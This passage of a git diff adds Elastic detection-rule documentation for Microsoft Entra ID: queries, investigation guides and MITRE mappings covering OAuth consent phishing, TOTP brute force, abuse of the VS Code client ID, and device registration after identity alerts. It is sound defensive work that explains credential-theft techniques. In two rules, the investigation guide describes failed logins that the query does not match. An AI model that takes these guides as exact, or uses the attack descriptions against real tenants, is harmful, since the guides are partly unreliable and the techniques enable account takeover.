purposes. Validate whether the application is verified, developed by Microsoft, or approved internally by your organization. +- Review publisher verification, app ownership, and scope alignment with the intended business use case. + + +*Response and remediation* + + +- Revoke the application’s OAuth grant using Graph API or PowerShell. Use the Remove-AzureADOAuth2PermissionGrant cmdlet. +- Remove the associated service principal from Azure AD. +- Reset credentials or revoke tokens for affected users. +- Block the application via Conditional Access or Defender for Cloud Apps policies. +- Enable the Admin Consent Workflow in Azure AD to prevent unsanctioned user approvals in the future. +- Report any malicious applications to Microsoft to protect other tenants. 
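+
+To scope the blast radius during triage, a minimal KQL filter over the audit logs can list other successful consent grants initiated by the same user. This is a sketch only: the user principal name placeholder is hypothetical and should be replaced with the value of `azure.auditlogs.properties.initiated_by.user.userPrincipalName` from the alert.
+
+[source, js]
+----------------------------------
+event.dataset: "azure.auditlogs" and
+  azure.auditlogs.operation_name: "Consent to application" and
+  event.outcome: "success" and
+  azure.auditlogs.properties.initiated_by.user.userPrincipalName: "<affected-user>"
+
+----------------------------------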
+
+
+==== Rule query
+
+
+[source, js]
+----------------------------------
+event.dataset: "azure.auditlogs" and
+  (
+    azure.auditlogs.operation_name:"Consent to application"
+    or event.action:"Consent to application"
+  )
+  and event.outcome: "success"
+  and azure.auditlogs.properties.additional_details.key: "AppId"
+
+----------------------------------
+
+*Framework*: MITRE ATT&CK^TM^
+
+* Tactic:
+** Name: Initial Access
+** ID: TA0001
+** Reference URL: https://attack.mitre.org/tactics/TA0001/
+* Technique:
+** Name: Phishing
+** ID: T1566
+** Reference URL: https://attack.mitre.org/techniques/T1566/
+* Sub-technique:
+** Name: Spearphishing Link
+** ID: T1566.002
+** Reference URL: https://attack.mitre.org/techniques/T1566/002/
+* Tactic:
+** Name: Credential Access
+** ID: TA0006
+** Reference URL: https://attack.mitre.org/tactics/TA0006/
+* Technique:
+** Name: Steal Application Access Token
+** ID: T1528
+** Reference URL: https://attack.mitre.org/techniques/T1528/
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-entra-id-mfa-totp-brute-force-attempts.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-entra-id-mfa-totp-brute-force-attempts.asciidoc
new file mode 100644
index 0000000000..435c545067
--- /dev/null
+++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-entra-id-mfa-totp-brute-force-attempts.asciidoc
@@ -0,0 +1,199 @@
+[[prebuilt-rule-8-19-8-microsoft-entra-id-mfa-totp-brute-force-attempts]]
+=== Microsoft Entra ID MFA TOTP Brute Force Attempts
+
+Identifies brute force attempts against Azure Entra multi-factor authentication (MFA) Time-based One-Time Password (TOTP) verification codes. This rule detects high-frequency failed TOTP code attempts for a single user in a short time-span with a high number of distinct session IDs. Adversaries may programmatically attempt to brute-force TOTP codes by generating several sessions and attempting to guess the correct code.
+
+*Rule type*: esql
+
+*Rule indices*: None
+
+*Severity*: medium
+
+*Risk score*: 47
+
+*Runs every*: 5m
+
+*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>)
+
+*Maximum alerts per execution*: 100
+
+*References*:
+
+* https://www.oasis.security/resources/blog/oasis-security-research-team-discovers-microsoft-azure-mfa-bypass
+* https://learn.microsoft.com/en-us/entra/identity/
+* https://learn.microsoft.com/en-us/entra/identity/monitoring-health/concept-sign-ins
+
+*Tags*:
+
+* Domain: Cloud
+* Domain: Identity
+* Data Source: Azure
+* Data Source: Entra ID
+* Data Source: Entra ID Sign-in logs
+* Use Case: Identity and Access Audit
+* Use Case: Threat Detection
+* Tactic: Credential Access
+* Resources: Investigation Guide
+
+*Version*: 5
+
+*Rule authors*:
+
+* Elastic
+
+*Rule license*: Elastic License v2
+
+
+==== Investigation guide
+
+
+
+*Triage and analysis*
+
+
+
+*Investigating Microsoft Entra ID MFA TOTP Brute Force Attempts*
+
+
+This rule detects brute force attempts against Azure Entra multi-factor authentication (MFA) Time-based One-Time Password (TOTP) verification codes. It identifies high-frequency failed TOTP code attempts for a single user in a short time-span with a high number of distinct session IDs. Adversaries may programmatically attempt to brute-force TOTP codes by generating several sessions and attempting to guess the correct code. 
+
+
+*Possible Investigation Steps:*
+
+
+ - Check the source addresses associated with the failed TOTP attempts.
+ - Determine if the source IP address is consistent with the user's typical login locations.
+ - Look for unusual geographic patterns or anomalous IP addresses (e.g., proxies, VPNs, or locations outside the user's normal activity).
+ - Review the error code associated with the failed attempts. This can help identify if the failures are due to incorrect TOTP codes or other issues.
+ - Verify that the auth method reported is `OATH`, as it indicates the use of TOTP codes.
+ - Pivot into sign-in logs for the target user and check if auth via TOTP was successful, which would indicate a successful brute force attempt (see the example pivot query after the Setup section below).
+ - Review conditional access policies applied to the user or group as reported by the sign-in logs.
+ - Analyze the client application ID and display name to determine if the attempts are coming from a legitimate application or a potentially malicious script.
+ - Adversaries may use legitimate FOCI applications to bypass security controls or make login attempts appear legitimate.
+ - Review the resource ID access is being attempted against, such as MyApps, Microsoft Graph, or other resources. This can help identify if the attempts are targeting specific applications or services.
+ - The correlation IDs or session IDs can be used to trace the authentication attempts across different logs or systems. Note that for this specific behavior, the unique session ID count is high and could be challenging to correlate.
+
+
+*False Positive Analysis:*
+
+
+ - Verify if the failed attempts could result from the user's unfamiliarity with TOTP codes or issues with device synchronization.
+ - Check if the user recently switched MFA methods or devices, which could explain multiple failures.
+ - Determine if this is whitebox testing or a developer testing MFA integration.
+
+
+*Response and Remediation:*
+
+
+ - If proven malicious, lock the affected account temporarily to prevent further unauthorized attempts.
+ - Notify the user of suspicious activity and validate their access to the account.
+ - Reset passwords and MFA settings for the affected user to prevent unauthorized access while communicating with the user.
+ - Ensure conditional access policies are configured to monitor and restrict anomalous login behavior.
+ - Consider a different MFA method or additional security controls to prevent future bypass attempts.
+ - Implement additional monitoring to track high-frequency authentication failures across the environment.
+ - Audit historical logs for similar patterns involving other accounts to identify broader threats.
+ - Provide guidance on the secure use of MFA and the importance of recognizing and reporting suspicious activity.
+
+
+==== Setup
+
+
+
+*Required Entra ID Sign-In Logs*
+
+This rule requires the Entra ID sign-in logs via the Azure integration to be enabled. In Entra ID, sign-in logs must be enabled and streaming to the Event Hub used for the Entra ID logs integration. 
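+
+The sign-in pivot referenced in the investigation steps above can be sketched as a simple KQL filter. It assumes the target user principal name is taken from the alert (the placeholder is hypothetical); the `OATH verification code` method value comes from the rule query below.
+
+[source, js]
+----------------------------------
+event.dataset: "azure.signinlogs" and
+  azure.signinlogs.properties.user_principal_name: "<target-user>" and
+  azure.signinlogs.properties.mfa_detail.auth_method: "OATH verification code" and
+  event.outcome: "success"
+
+----------------------------------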
+ + +==== Rule query + + +[source, js] +---------------------------------- +from logs-azure.signinlogs-* metadata _id, _version, _index + +| where + // filter for Entra Sign-in Logs + event.dataset == "azure.signinlogs" + and azure.signinlogs.operation_name == "Sign-in activity" + and azure.signinlogs.properties.user_type == "Member" + + // filter for MFA attempts with OATH conditional access attempts or TOTP + and azure.signinlogs.properties.mfa_detail.auth_method == "OATH verification code" + + // filter on failures only from brute-force attempts + and ( + ( + azure.signinlogs.result_signature == "FAILURE" and + azure.signinlogs.result_description == "Authentication failed during strong authentication request." + ) or azure.signinlogs.properties.status.error_code == 500121 + ) + +| stats + Esql.event_count = count(*), + Esql.azure_signinlogs_properties_session_id_count_distinct = count_distinct(azure.signinlogs.properties.session_id), + Esql.source_address_values = values(source.address), + Esql.azure_tenant_id_valuues = values(azure.tenant_id), + Esql_priv.azure_identity_values = values(azure.signinlogs.identity), + Esql_priv.azure_signinlogs_properties_user_principal_name_values = values(azure.signinlogs.properties.user_principal_name), + Esql.azure_signinlogs_properties_app_id_values = values(azure.signinlogs.properties.app_id), + Esql.azure_signinlogs_properties_app_display_name_values = values(azure.signinlogs.properties.app_display_name), + Esql.azure_signinlogs_properties_authentication_requirement_values = values(azure.signinlogs.properties.authentication_requirement), + Esql.azure_signinlogs_properties_authentication_protocol_values = values(azure.signinlogs.properties.authentication_protocol), + Esql.azure_signinlogs_properties_client_app_used_values = values(azure.signinlogs.properties.client_app_used), + Esql.azure_signinlogs_properties_client_credential_type_values = values(azure.signinlogs.properties.client_credential_type), + Esql.azure_signinlogs_properties_conditional_access_status_values = values(azure.signinlogs.properties.conditional_access_status), + Esql.azure_signinlogs_properties_correlation_id_values = values(azure.signinlogs.properties.correlation_id), + Esql.azure_signinlogs_properties_is_interactive_values = values(azure.signinlogs.properties.is_interactive), + Esql.azure_signinlogs_properties_mfa_detail_auth_method_values = values(azure.signinlogs.properties.mfa_detail.auth_method), + Esql.azure_signinlogs_properties_resource_display_name_values = values(azure.signinlogs.properties.resource_display_name), + Esql.azure_signinlogs_properties_resource_id_values = values(azure.signinlogs.properties.resource_id), + Esql.azure_signinlogs_properties_risk_state_values = values(azure.signinlogs.properties.risk_state), + Esql.azure_signinlogs_properties_risk_detail_values = values(azure.signinlogs.properties.risk_detail), + Esql.azure_signinlogs_properties_status_error_code_values = values(azure.signinlogs.properties.status.error_code), + Esql.azure_signinlogs_properties_original_request_id_values = values(azure.signinlogs.properties.original_request_id), + Esql.user_id_values = values(user.id) + by user.id + +| where Esql.event_count >= 20 and Esql.azure_signinlogs_properties_session_id_count_distinct >= 10 + +| keep + Esql.event_count, + Esql.azure_signinlogs_properties_session_id_count_distinct, + Esql.source_address_values, + Esql.azure_tenant_id_valuues, + Esql_priv.azure_identity_values, + Esql_priv.azure_signinlogs_properties_user_principal_name_values, + 
Esql.azure_signinlogs_properties_app_id_values, + Esql.azure_signinlogs_properties_app_display_name_values, + Esql.azure_signinlogs_properties_authentication_requirement_values, + Esql.azure_signinlogs_properties_authentication_protocol_values, + Esql.azure_signinlogs_properties_client_app_used_values, + Esql.azure_signinlogs_properties_client_credential_type_values, + Esql.azure_signinlogs_properties_conditional_access_status_values, + Esql.azure_signinlogs_properties_correlation_id_values, + Esql.azure_signinlogs_properties_is_interactive_values, + Esql.azure_signinlogs_properties_mfa_detail_auth_method_values, + Esql.azure_signinlogs_properties_resource_display_name_values, + Esql.azure_signinlogs_properties_resource_id_values, + Esql.azure_signinlogs_properties_risk_state_values, + Esql.azure_signinlogs_properties_risk_detail_values, + Esql.azure_signinlogs_properties_status_error_code_values, + Esql.azure_signinlogs_properties_original_request_id_values, + Esql.user_id_values + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Brute Force +** ID: T1110 +** Reference URL: https://attack.mitre.org/techniques/T1110/ +* Sub-technique: +** Name: Password Guessing +** ID: T1110.001 +** Reference URL: https://attack.mitre.org/techniques/T1110/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-entra-id-oauth-phishing-via-visual-studio-code-client.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-entra-id-oauth-phishing-via-visual-studio-code-client.asciidoc new file mode 100644 index 0000000000..aee887ed93 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-entra-id-oauth-phishing-via-visual-studio-code-client.asciidoc @@ -0,0 +1,146 @@ +[[prebuilt-rule-8-19-8-microsoft-entra-id-oauth-phishing-via-visual-studio-code-client]] +=== Microsoft Entra ID OAuth Phishing via Visual Studio Code Client + +Detects potentially suspicious OAuth authorization activity in Microsoft Entra ID where the Visual Studio Code first-party application (client_id = aebc6443-996d-45c2-90f0-388ff96faa56) is used to request access to Microsoft Graph resources. While this client ID is legitimately used by Visual Studio Code, threat actors have been observed abusing it in phishing campaigns to make OAuth requests appear trustworthy. These attacks rely on redirect URIs such as VSCode's Insiders redirect location, prompting victims to return an OAuth authorization code that can be exchanged for access tokens. This rule may help identify unauthorized use of the VS Code OAuth flow as part of social engineering or credential phishing activity. 
+ +*Rule type*: query + +*Rule indices*: + +* filebeat-* +* logs-azure.signinlogs-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-azure-monitor-sign-ins-log-schema +* https://www.volexity.com/blog/2025/04/22/phishing-for-codes-russian-threat-actors-target-microsoft-365-oauth-workflows/ + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Data Source: Microsoft Entra ID +* Data Source: Microsoft Entra ID Sign-in Logs +* Use Case: Identity and Access Audit +* Resources: Investigation Guide +* Tactic: Initial Access + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Microsoft Entra ID OAuth Phishing via Visual Studio Code Client* + + + +*Possible investigation steps* + + +- Identify the source IP address from which the failed login attempts originated by reviewing `source.ip`. Determine if the IP is associated with known malicious activity using threat intelligence sources or if it belongs to a corporate VPN, proxy, or automation process. +- Analyze affected user accounts by reviewing `azure.signinlogs.properties.user_principal_name` to determine if they belong to privileged roles or high-value users. Look for patterns indicating multiple failed attempts across different users, which could suggest a password spraying attempt. +- Examine the authentication method used in `azure.signinlogs.properties.authentication_details` to identify which authentication protocols were attempted and why they failed. Legacy authentication methods may be more susceptible to brute-force attacks. +- Review the authentication error codes found in `azure.signinlogs.properties.status.error_code` to understand why the login attempts failed. Common errors include `50126` for invalid credentials, `50053` for account lockouts, `50055` for expired passwords, and `50056` for users without a password. +- Correlate failed logins with other sign-in activity by looking at `event.outcome`. Identify if there were any successful logins from the same user shortly after multiple failures or if there are different geolocations or device fingerprints associated with the same account. +- Review `azure.signinlogs.properties.app_id` to identify which applications were initiating the authentication attempts. Determine if these applications are Microsoft-owned, third-party, or custom applications and if they are authorized to access the resources. +- Check for any conditional access policies that may have been triggered by the failed login attempts by reviewing `azure.signinlogs.properties.authentication_requirement`. This can help identify if the failed attempts were due to policy enforcement or misconfiguration. + + +*False positive analysis* + + +- Automated scripts or applications using non-interactive authentication may trigger this detection, particularly if they rely on legacy authentication protocols recorded in `azure.signinlogs.properties.authentication_protocol`. +- Corporate proxies or VPNs may cause multiple users to authenticate from the same IP, appearing as repeated failed attempts under `source.ip`. 
+- User account lockouts from forgotten passwords or misconfigured applications may show multiple authentication failures in `azure.signinlogs.properties.status.error_code`.
+- Exclude known trusted IPs, such as corporate infrastructure, from alerts by filtering `source.ip`.
+- Exclude known custom applications from `azure.signinlogs.properties.app_id` that are authorized to use non-interactive authentication.
+- Ignore principals with a history of failed logins due to legitimate reasons, such as expired passwords or account lockouts, by filtering `azure.signinlogs.properties.user_principal_name`.
+- Correlate sign-in failures with password reset events or normal user behavior before triggering an alert.
+
+
+*Response and remediation*
+
+
+- Block the source IP address in `source.ip` if determined to be malicious.
+- Reset passwords for all affected user accounts listed in `azure.signinlogs.properties.user_principal_name` and enforce stronger password policies.
+- Ensure basic authentication is disabled for all applications using legacy authentication protocols listed in `azure.signinlogs.properties.authentication_protocol`.
+- Enable multi-factor authentication (MFA) for impacted accounts to mitigate credential-based attacks.
+- Review Conditional Access policies to enforce risk-based authentication and ensure they are correctly configured to block unauthorized access attempts recorded in `azure.signinlogs.properties.authentication_requirement`.
+- Implement a zero-trust security model by enforcing least privilege access and continuous authentication.
+- Regularly review and update Conditional Access policies to ensure they remain effective against evolving threats.
+- Restrict the use of legacy authentication protocols by disabling authentication methods listed in `azure.signinlogs.properties.client_app_used`.
+- Regularly audit authentication logs in `azure.signinlogs` to detect abnormal login behavior and ensure early detection of potential attacks.
+- Regularly rotate client credentials and secrets for applications using non-interactive authentication to reduce the risk of credential theft. 
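+
+To review what the flagged client has actually been used for, a minimal KQL pivot can list every successful sign-in by an affected user through the Visual Studio Code client ID referenced in the rule query below. This is a sketch only: the user principal name placeholder is hypothetical.
+
+[source, js]
+----------------------------------
+event.dataset: "azure.signinlogs" and
+  event.outcome: "success" and
+  azure.signinlogs.properties.app_id: "aebc6443-996d-45c2-90f0-388ff96faa56" and
+  azure.signinlogs.properties.user_principal_name: "<affected-user>"
+
+----------------------------------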
+ + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset: "azure.signinlogs" and +event.action: "Sign-in activity" and +event.outcome: "success" and +( + azure.signinlogs.properties.resource_display_name: "Microsoft Graph" or + azure.signinlogs.properties.resource_id: "00000003-0000-0000-c000-000000000000" +) and ( + azure.signinlogs.properties.app_id: "aebc6443-996d-45c2-90f0-388ff96faa56" or + azure.signinlogs.properties.app_display_name: "Visual Studio Code" +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Cloud Accounts +** ID: T1078.004 +** Reference URL: https://attack.mitre.org/techniques/T1078/004/ +* Technique: +** Name: Phishing +** ID: T1566 +** Reference URL: https://attack.mitre.org/techniques/T1566/ +* Sub-technique: +** Name: Spearphishing Link +** ID: T1566.002 +** Reference URL: https://attack.mitre.org/techniques/T1566/002/ +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Steal Application Access Token +** ID: T1528 +** Reference URL: https://attack.mitre.org/techniques/T1528/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-entra-id-protection-alert-and-device-registration.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-entra-id-protection-alert-and-device-registration.asciidoc new file mode 100644 index 0000000000..0f49e7b4fb --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-entra-id-protection-alert-and-device-registration.asciidoc @@ -0,0 +1,132 @@ +[[prebuilt-rule-8-19-8-microsoft-entra-id-protection-alert-and-device-registration]] +=== Microsoft Entra ID Protection Alert and Device Registration + +Identifies sequence of events where a Microsoft Entra ID protection alert is followed by an attempt to register a new device by the same user principal. This behavior may indicate an adversary using a compromised account to register a device, potentially leading to unauthorized access to resources or persistence in the environment. 
+ +*Rule type*: eql + +*Rule indices*: + +* logs-azure.identity_protection-* +* logs-azure.auditlogs-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-azure-monitor-sign-ins-log-schema +* https://docs.microsoft.com/en-us/azure/active-directory/identity-protection/overview-identity-protection +* https://docs.microsoft.com/en-us/azure/active-directory/identity-protection/howto-identity-protection-investigate-risk +* https://docs.microsoft.com/en-us/azure/active-directory/identity-protection/howto-identity-protection-investigate-risk#investigation-framework + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Data Source: Microsoft Entra ID +* Data Source: Microsoft Entra ID Protection Logs +* Data Source: Microsoft Entra ID Audit Logs +* Use Case: Identity and Access Audit +* Resources: Investigation Guide +* Tactic: Persistence + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Microsoft Entra ID Protection Alert and Device Registration* + + + +*Possible investigation steps* + + +- Identify the Risk Detection that triggered the event. A list with descriptions can be found https://docs.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#risk-types-and-detection[here]. +- Identify the user account involved and validate whether the suspicious activity is normal for that user. + - Consider the source IP address and geolocation for the involved user account. Do they look normal? + - Consider the device used to sign in. Is it registered and compliant? +- Investigate other alerts associated with the user account during the past 48 hours. +- Contact the account owner and confirm whether they are aware of this activity. +- Check if this operation was approved and performed according to the organization's change management policy. +- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services, and data accessed by the account in the last 24 hours. + + +*False positive analysis* + +- If this rule is noisy in your environment due to expected activity, consider adding exceptions — preferably with a combination of user and device conditions. +- Consider the context of the user account and whether the activity is expected. For example, if the user is a developer or administrator, they may have legitimate reasons for accessing resources from various locations or devices. +- A Microsoft Entra ID Protection alert may be triggered by legitimate activities such as password resets, MFA changes, or device registrations. If the user is known to perform these actions regularly, it may not indicate a compromise. + + +*Response and remediation* + + +- Initiate the incident response process based on the outcome of the triage. +- Disable or limit the account during the investigation and response. +- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context: + - Identify the account role in the cloud environment. + - Assess the criticality of affected services and servers. + - Work with your IT team to identify and minimize the impact on users. 
+ - Identify if the attacker is moving laterally and compromising other accounts, servers, or services. + - Identify any regulatory or legal ramifications related to this activity. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with your IT teams to minimize the impact on business operations during these actions. +- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other IAM users. +- Consider enabling multi-factor authentication for users. +- Follow security best practices https://docs.microsoft.com/en-us/azure/security/fundamentals/identity-management-best-practices[outlined] by Microsoft. +- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + +==== Rule query + + +[source, js] +---------------------------------- +sequence with maxspan=5m +[any where event.dataset == "azure.identity_protection"] by azure.identityprotection.properties.user_principal_name +[any where event.dataset == "azure.auditlogs" and event.action == "Register device"] by azure.auditlogs.properties.initiated_by.user.userPrincipalName + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ +* Sub-technique: +** Name: Device Registration +** ID: T1098.005 +** Reference URL: https://attack.mitre.org/techniques/T1098/005/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Cloud Accounts +** ID: T1078.004 +** Reference URL: https://attack.mitre.org/techniques/T1078/004/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-entra-id-rare-authentication-requirement-for-principal-user.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-entra-id-rare-authentication-requirement-for-principal-user.asciidoc new file mode 100644 index 0000000000..538b0ef2a6 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-entra-id-rare-authentication-requirement-for-principal-user.asciidoc @@ -0,0 +1,164 @@ +[[prebuilt-rule-8-19-8-microsoft-entra-id-rare-authentication-requirement-for-principal-user]] +=== Microsoft Entra ID Rare Authentication Requirement for Principal User + +Identifies rare instances of authentication requirements for Azure Entra ID principal users. An adversary with stolen credentials may attempt to authenticate with unusual authentication requirements, which is a rare event and may indicate an attempt to bypass conditional access policies (CAP) and multi-factor authentication (MFA) requirements. The authentication requirements specified may not be commonly used by the user based on their historical sign-in activity. 
+ +*Rule type*: new_terms + +*Rule indices*: + +* filebeat-* +* logs-azure.signinlogs-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://securityscorecard.com/wp-content/uploads/2025/02/MassiveBotnet-Report_022125_03.pdf + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Data Source: Microsoft Entra ID +* Data Source: Microsoft Entra ID Sign-in Logs +* Use Case: Identity and Access Audit +* Use Case: Threat Detection +* Tactic: Initial Access +* Resources: Investigation Guide + +*Version*: 5 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Microsoft Entra ID Rare Authentication Requirement for Principal User* + + +Identifies rare instances of authentication requirements for Azure Entra ID principal users. An adversary with stolen credentials may attempt to authenticate with unusual authentication requirements, which is a rare event and may indicate an attempt to bypass conditional access policies (CAP) and multi-factor authentication (MFA) requirements. The authentication requirements specified may not be commonly used by the user based on their historical sign-in activity. + +**This is a New Terms rule that focuses on first occurrence of an Entra ID principal user `azure.signinlogs.properties.user_principal_name` and their authentication requirement `azure.signinlogs.properties.authentication_requirement` in the last 14-days.** + + +*Possible investigation steps* + + +- Identify the source IP address from which the failed login attempts originated by reviewing `source.ip`. Determine if the IP is associated with known malicious activity using threat intelligence sources or if it belongs to a corporate VPN, proxy, or automation process. +- Analyze affected user accounts by reviewing `azure.signinlogs.properties.user_principal_name` to determine if they belong to privileged roles or high-value users. Look for patterns indicating multiple failed attempts across different users, which could suggest a password spraying attempt. +- Examine the authentication method used in `azure.signinlogs.properties.authentication_details` to identify which authentication protocols were attempted and why they failed. Legacy authentication methods may be more susceptible to brute-force attacks. +- Review the authentication error codes found in `azure.signinlogs.properties.status.error_code` to understand why the login attempts failed. Common errors include `50126` for invalid credentials, `50053` for account lockouts, `50055` for expired passwords, and `50056` for users without a password. +- Correlate failed logins with other sign-in activity by looking at `event.outcome`. Identify if there were any successful logins from the same user shortly after multiple failures or if there are different geolocations or device fingerprints associated with the same account. +- Review `azure.signinlogs.properties.app_id` to identify which applications were initiating the authentication attempts. Determine if these applications are Microsoft-owned, third-party, or custom applications and if they are authorized to access the resources. +- Check for any conditional access policies that may have been triggered by the failed login attempts by reviewing `azure.signinlogs.properties.authentication_requirement`. 
This can help identify if the failed attempts were due to policy enforcement or misconfiguration. + + +*False positive analysis* + + + +*Common benign scenarios* + +- Automated scripts or applications using non-interactive authentication may trigger this detection, particularly if they rely on legacy authentication protocols recorded in `azure.signinlogs.properties.authentication_protocol`. +- Corporate proxies or VPNs may cause multiple users to authenticate from the same IP, appearing as repeated failed attempts under `source.ip`. +- User account lockouts from forgotten passwords or misconfigured applications may show multiple authentication failures in `azure.signinlogs.properties.status.error_code`. + + +*How to reduce false positives* + +- Exclude known trusted IPs, such as corporate infrastructure, from alerts by filtering `source.ip`. +- Exclude known custom applications from `azure.signinlogs.properties.app_id` that are authorized to use non-interactive authentication. +- Ignore principals with a history of failed logins due to legitimate reasons, such as expired passwords or account lockouts, by filtering `azure.signinlogs.properties.user_principal_name` (see the baseline query example below). +- Correlate sign-in failures with password reset events or normal user behavior before triggering an alert. + + +*Response and remediation* + + + +*Immediate actions* + +- Block the source IP address in `source.ip` if determined to be malicious. +- Reset passwords for all affected user accounts listed in `azure.signinlogs.properties.user_principal_name` and enforce stronger password policies. +- Ensure basic authentication is disabled for all applications using legacy authentication protocols listed in `azure.signinlogs.properties.authentication_protocol`. +- Enable multi-factor authentication (MFA) for impacted accounts to mitigate credential-based attacks. +- Review Conditional Access policies to ensure they enforce risk-based authentication and correctly block unauthorized access attempts recorded in `azure.signinlogs.properties.authentication_requirement`. + + +*Long-term mitigation* + +- Implement a zero-trust security model by enforcing least privilege access and continuous authentication. +- Regularly review and update Conditional Access policies to ensure they are effective against evolving threats. +- Restrict the use of legacy authentication protocols by disabling authentication methods listed in `azure.signinlogs.properties.client_app_used`. +- Regularly audit authentication logs in `azure.signinlogs` to detect abnormal login behavior and ensure early detection of potential attacks. +- Regularly rotate client credentials and secrets for applications using non-interactive authentication to reduce the risk of credential theft.
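+
+To support the triage and false positive checks above, the following illustrative ES|QL sketch baselines a single principal's historical authentication requirements and client applications. The user principal name is a placeholder to replace with the value from the alert, and the index pattern matches this rule's indices:
+
+[source, js]
+----------------------------------
+// Illustrative baseline query, not part of the rule itself
+from logs-azure.signinlogs-*
+| where event.dataset == "azure.signinlogs"
+    // placeholder principal; substitute azure.signinlogs.properties.user_principal_name from the alert
+    and azure.signinlogs.properties.user_principal_name == "user@example.com"
+| stats Esql.event_count = count(*),
+        Esql.timestamp_first_seen = min(@timestamp),
+        Esql.timestamp_last_seen = max(@timestamp)
+    by azure.signinlogs.properties.authentication_requirement,
+       azure.signinlogs.properties.client_app_used
+| sort Esql.event_count desc
+----------------------------------
+
+A requirement and client combination that appears only around the alert time, while older sign-ins consistently used a different requirement, supports the rare-authentication-requirement hypothesis rather than a false positive.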
+ + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset: "azure.signinlogs" and event.category: "authentication" + and azure.signinlogs.properties.user_type: "Member" + and azure.signinlogs.properties.authentication_details.authentication_method: "Password" + and not azure.signinlogs.properties.device_detail.browser: * + and not source.as.organization.name: "MICROSOFT-CORP-MSN-AS-BLOCK" + and not azure.signinlogs.properties.authentication_requirement: "multiFactorAuthentication" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Cloud Accounts +** ID: T1078.004 +** Reference URL: https://attack.mitre.org/techniques/T1078/004/ +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Brute Force +** ID: T1110 +** Reference URL: https://attack.mitre.org/techniques/T1110/ +* Sub-technique: +** Name: Password Spraying +** ID: T1110.003 +** Reference URL: https://attack.mitre.org/techniques/T1110/003/ +* Tactic: +** Name: Defense Evasion +** ID: 